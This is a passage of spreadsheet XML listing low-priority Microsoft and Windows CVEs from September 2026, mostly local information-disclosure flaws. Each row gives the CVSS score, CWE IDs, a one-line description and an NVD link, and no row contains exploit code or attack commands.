          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t>
        </is>
      </c>
    </row>
    <row r="1779">
      <c r="A1779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68851</t>
        </is>
      </c>
      <c r="C1779" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1779" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1779" s="5" t="inlineStr"/>
      <c r="F1779" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1779" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1779" s="5" t="inlineStr"/>
      <c r="I1779" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1779" s="5" t="inlineStr"/>
      <c r="K1779" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1779" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t>
        </is>
      </c>
    </row>
    <row r="1780">
      <c r="A1780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68852</t>
        </is>
      </c>
      <c r="C1780" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1780" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1780" s="5" t="inlineStr"/>
      <c r="F1780" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1780" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1780" s="5" t="inlineStr"/>
      <c r="I1780" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1780" s="5" t="inlineStr"/>
      <c r="K1780" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-908</t>
        </is>
      </c>
      <c r="L1780" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t>
        </is>
      </c>
    </row>
    <row r="1781">
      <c r="A1781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68873</t>
        </is>
      </c>
      <c r="C1781" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1781" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1781" s="5" t="inlineStr"/>
      <c r="F1781" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1781" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1781" s="5" t="inlineStr"/>
      <c r="I1781" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1781" s="5" t="inlineStr"/>
      <c r="K1781" s="5" t="inlineStr">
        <is>
          <t>CWE-532, CWE-908</t>
        </is>
      </c>
      <c r="L1781" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t>
        </is>
      </c>
    </row>
    <row r="1782">
      <c r="A1782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68881</t>
        </is>
      </c>
      <c r="C1782" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1782" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1782" s="5" t="inlineStr"/>
      <c r="F1782" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1782" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1782" s="5" t="inlineStr"/>
      <c r="I1782" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1782" s="5" t="inlineStr"/>
      <c r="K1782" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1782" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t>
        </is>
      </c>
    </row>
    <row r="1783">
      <c r="A1783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68886</t>
        </is>
      </c>
      <c r="C1783" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1783" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1783" s="5" t="inlineStr"/>
      <c r="F1783" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1783" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1783" s="5" t="inlineStr"/>
      <c r="I1783" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1783" s="5" t="inlineStr"/>
      <c r="K1783" s="5" t="inlineStr">
        <is>
          <t>CWE-209, CWE-416</t>
        </is>
      </c>
      <c r="L1783" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t>
        </is>
      </c>
    </row>
    <row r="1784">
      <c r="A1784" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="C1784" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1784" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1784" s="5" t="inlineStr"/>
      <c r="F1784" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1784" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1784" s="5" t="inlineStr"/>
      <c r="I1784" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1784" s="5" t="inlineStr"/>
      <c r="K1784" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L1784" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="1785">
      <c r="A1785" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69288</t>
        </is>
      </c>
      <c r="C1785" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1785" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1785" s="5" t="inlineStr"/>
      <c r="F1785" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1785" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1785" s="5" t="inlineStr"/>
      <c r="I1785" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1785" s="5" t="inlineStr"/>
      <c r="K1785" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1785" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t>
        </is>
      </c>
    </row>
    <row r="1786">
      <c r="A1786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69294</t>
        </is>
      </c>
      <c r="C1786" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1786" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1786" s="5" t="inlineStr"/>
      <c r="F1786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1786" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1786" s="5" t="inlineStr"/>
      <c r="I1786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1786" s="5" t="inlineStr"/>
      <c r="K1786" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L1786" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t>
        </is>
      </c>
    </row>
    <row r="1787">
      <c r="A1787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69308</t>
        </is>
      </c>
      <c r="C1787" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1787" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1787" s="5" t="inlineStr"/>
      <c r="F1787" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1787" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1787" s="5" t="inlineStr"/>
      <c r="I1787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1787" s="5" t="inlineStr"/>
      <c r="K1787" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L1787" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t>
        </is>
      </c>
    </row>
    <row r="1788">
      <c r="A1788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69315</t>
        </is>
      </c>
      <c r="C1788" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1788" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1788" s="5" t="inlineStr"/>
      <c r="F1788" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1788" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1788" s="5" t="inlineStr"/>
      <c r="I1788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1788" s="5" t="inlineStr"/>
      <c r="K1788" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1788" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t>
        </is>
      </c>
    </row>
    <row r="1789">
      <c r="A1789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69318</t>
        </is>
      </c>
      <c r="C1789" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1789" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1789" s="5" t="inlineStr"/>
      <c r="F1789" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1789" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1789" s="5" t="inlineStr"/>
      <c r="I1789" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1789" s="5" t="inlineStr"/>
      <c r="K1789" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1789" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t>
        </is>
      </c>
    </row>
    <row r="1790">
      <c r="A1790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69321</t>
        </is>
      </c>
      <c r="C1790" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1790" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1790" s="5" t="inlineStr"/>
      <c r="F1790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1790" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1790" s="5" t="inlineStr"/>
      <c r="I1790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1790" s="5" t="inlineStr"/>
      <c r="K1790" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1790" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t>
        </is>
      </c>
    </row>
    <row r="1791">
      <c r="A1791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69339</t>
        </is>
      </c>
      <c r="C1791" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1791" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1791" s="5" t="inlineStr"/>
      <c r="F1791" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1791" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1791" s="5" t="inlineStr"/>
      <c r="I1791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1791" s="5" t="inlineStr"/>
      <c r="K1791" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1791" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t>
        </is>
      </c>
    </row>
    <row r="1792">
      <c r="A1792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="C1792" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1792" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1792" s="5" t="inlineStr"/>
      <c r="F1792" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1792" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1792" s="5" t="inlineStr"/>
      <c r="I1792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1792" s="5" t="inlineStr"/>
      <c r="K1792" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1792" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69344</t>
        </is>
      </c>
      <c r="C1793" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1793" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1793" s="5" t="inlineStr"/>
      <c r="F1793" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1793" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1793" s="5" t="inlineStr"/>
      <c r="I1793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1793" s="5" t="inlineStr"/>
      <c r="K1793" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1793" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t>
        </is>
      </c>
    </row>
    <row r="1794">
      <c r="A1794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69345</t>
        </is>
      </c>
      <c r="C1794" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1794" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1794" s="5" t="inlineStr"/>
      <c r="F1794" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1794" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1794" s="5" t="inlineStr"/>
      <c r="I1794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1794" s="5" t="inlineStr"/>
      <c r="K1794" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1794" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t>
        </is>
      </c>
    </row>
    <row r="1795">
      <c r="A1795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69351</t>
        </is>
      </c>
      <c r="C1795" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1795" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1795" s="5" t="inlineStr"/>
      <c r="F1795" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1795" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1795" s="5" t="inlineStr"/>
      <c r="I1795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1795" s="5" t="inlineStr"/>
      <c r="K1795" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="L1795" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t>
        </is>
      </c>
    </row>
    <row r="1796">
      <c r="A1796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69353</t>
        </is>
      </c>
      <c r="C1796" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1796" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1796" s="5" t="inlineStr"/>
      <c r="F1796" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1796" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1796" s="5" t="inlineStr"/>
      <c r="I1796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1796" s="5" t="inlineStr"/>
      <c r="K1796" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1796" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t>
        </is>
      </c>
    </row>
    <row r="1797">
      <c r="A1797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69367</t>
        </is>
      </c>
      <c r="C1797" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1797" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1797" s="5" t="inlineStr"/>
      <c r="F1797" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1797" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1797" s="5" t="inlineStr"/>
      <c r="I1797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1797" s="5" t="inlineStr"/>
      <c r="K1797" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1797" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t>
        </is>
      </c>
    </row>
    <row r="1798">
      <c r="A1798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69369</t>
        </is>
      </c>
      <c r="C1798" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1798" s="5" t="inlineStr"/>
      <c r="F1798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1798" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1798" s="5" t="inlineStr"/>
      <c r="I1798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1798" s="5" t="inlineStr"/>
      <c r="K1798" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1798" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t>
        </is>
      </c>
    </row>
    <row r="1799">
      <c r="A1799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69376</t>
        </is>
      </c>
      <c r="C1799" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1799" s="5" t="inlineStr"/>
      <c r="F1799" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1799" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1799" s="5" t="inlineStr"/>
      <c r="I1799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1799" s="5" t="inlineStr"/>
      <c r="K1799" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1799" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t>
        </is>
      </c>
    </row>
    <row r="1800">
      <c r="A1800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69390</t>
        </is>
      </c>
      <c r="C1800" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1800" s="5" t="inlineStr"/>
      <c r="F1800" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1800" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1800" s="5" t="inlineStr"/>
      <c r="I1800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1800" s="5" t="inlineStr"/>
      <c r="K1800" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1800" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t>
        </is>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69403</t>
        </is>
      </c>
      <c r="C1801" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1801" s="5" t="inlineStr"/>
      <c r="F1801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1801" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1801" s="5" t="inlineStr"/>
      <c r="I1801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1801" s="5" t="inlineStr"/>
      <c r="K1801" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1801" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t>
        </is>
      </c>
    </row>
    <row r="1802">
      <c r="A1802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69406</t>
        </is>
      </c>
      <c r="C1802" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1802" s="5" t="inlineStr"/>
      <c r="F1802" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1802" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1802" s="5" t="inlineStr"/>
      <c r="I1802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1802" s="5" t="inlineStr"/>
      <c r="K1802" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1802" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t>
        </is>
      </c>
